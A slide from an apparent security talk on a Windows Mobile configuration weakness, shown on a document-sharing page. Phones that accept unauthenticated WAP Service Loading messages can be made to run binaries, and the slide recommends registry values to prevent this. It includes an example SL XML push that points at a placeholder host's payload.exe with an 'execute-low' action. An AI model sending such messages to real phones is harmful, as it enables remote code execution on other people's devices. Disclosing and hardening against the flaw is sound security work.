X hits on this document

178 views

0 shares

0 downloads

0 comments

28 / 66

Configuration vulnerability

  • Microsoft recommends strict permissions for WAPSL

Do not put SECROLE_USER_UNAUTH security role in Service Loading (SL) Message Policy.”

I n p r a c t i c e , m a n y p h o n e s a l l o w S E C R O L E _ U S E R _ U N A U T H W A P S L m e s s a g e s

  • This means unauthenticated users executing binaries on phones.

  • HKLM\Security\Policies\Policies (recommended values)

    • 0x0000100c : 0x800

    • 0x0000100d : 0xc00

  • Example WAP SL WXML <?xml version="1.0"?> <!DOCTYPE sl PUBLIC "-//WAPFORUM//DTD SL 1.0//EN" "http://www.wapforum.org/DTD/sl.dtd"> <sl href="http://example.com/payload.exe" action="execute-low" ></sl>

RingZero

https://luis.ringzero.net

Document info
Document views178
Page views178
Page last viewedSat Dec 10 07:17:36 UTC 2016
Pages66
Paragraphs677
Words1985

Comments